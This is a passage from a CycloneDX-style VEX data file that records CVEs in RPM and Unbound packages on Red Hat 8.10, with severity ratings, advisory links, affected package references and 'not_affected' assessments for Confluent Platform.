          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/python3-rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/rpm-build-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/rpm-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/python3-rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/rpm-build-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/rpm-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/python3-rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/rpm-build-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/rpm-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/python3-rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/rpm-build-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/rpm-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/python3-rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/rpm-build-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/rpm-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/python3-rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/rpm-build-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/rpm-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-44605",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.5,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        190
      ],
      "description": "A flaw was found in the RPM Package Manager (RPM). A local user could be affected by a heap buffer overflow vulnerability when processing a specially crafted NDB database file. This issue arises from an error in how RPM handles certain calculations during file parsing, leading to an incorrect memory allocation. An attacker could leverage this to cause a denial of service, making the system unavailable.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-44605"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:33507"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-44605"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2482481"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44605"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-44605"
        }
      ],
      "published": "2026-08-05T18:17:11+00:00",
      "updated": "2026-08-06T15:37:22+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python3-rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "4.14.3-32.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/rpm-build-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "4.14.3-32.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/rpm-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "4.14.3-32.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "4.14.3-32.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/python3-rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/rpm-build-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/rpm-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/python3-rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/rpm-build-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/rpm-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/python3-rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/rpm-build-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/rpm-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/python3-rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/rpm-build-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/rpm-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/python3-rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/rpm-build-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/rpm-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/python3-rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/rpm-build-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/rpm-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/python3-rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/rpm-build-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/rpm-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/python3-rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/rpm-build-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/rpm-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/python3-rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/rpm-build-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/rpm-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/python3-rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/rpm-build-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/rpm-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/python3-rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/rpm-build-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/rpm-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/python3-rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/rpm-build-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/rpm-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/python3-rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/rpm-build-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/rpm-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/python3-rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/rpm-build-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/rpm-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/python3-rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/rpm-build-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/rpm-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/python3-rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/rpm-build-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/rpm-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/python3-rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/rpm-build-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/rpm-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/python3-rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/rpm-build-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/rpm-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/python3-rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/rpm-build-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/rpm-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/python3-rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/rpm-build-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/rpm-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/python3-rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/rpm-build-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/rpm-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-44608",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        413
      ],
      "description": "NLnet Labs Unbound 1.14.0 up to and including version 1.25.0 has a locking inconsistency vulnerability that when certain conditions are met (multi-threaded, RPZ XFR reload, RPZ zone with 'rpz-nsip'/'rpz-nsdname' triggers) it could result in heap use-after-free and eventual crash. An adversary can exploit the vulnerability if conditions are first met on a vulnerable Unbound, i.e., multi-threaded, an RPZ zone with 'rpz-nsip'/'rpz-nsdname' triggers and an ongoing XFR for that RPZ zone. Local RPZ files do not trigger the vulnerability. If the timing is right and an XFR happens at the same time another thread needs to read that RPZ zone, the reader may not hold the lock long enough and the thread applying the XFR may free objects that the reader is about to walk causing the use-after-free. Unbound 1.25.1 contains a patch with a fix to the locking code.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-44608"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-44608"
        },
        {
          "url": "https://nlnetlabs.nl/news/2026/May/20/unbound-1.25.1-released/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44608"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8282-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-44608"
        },
        {
          "url": "https://www.nlnetlabs.nl/downloads/unbound/CVE-2026-44608.txt"
        }
      ],
      "published": "2026-05-20T10:16:28+00:00",
      "updated": "2026-07-24T10:10:00+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.16.2-5.12.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.16.2-5.12.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
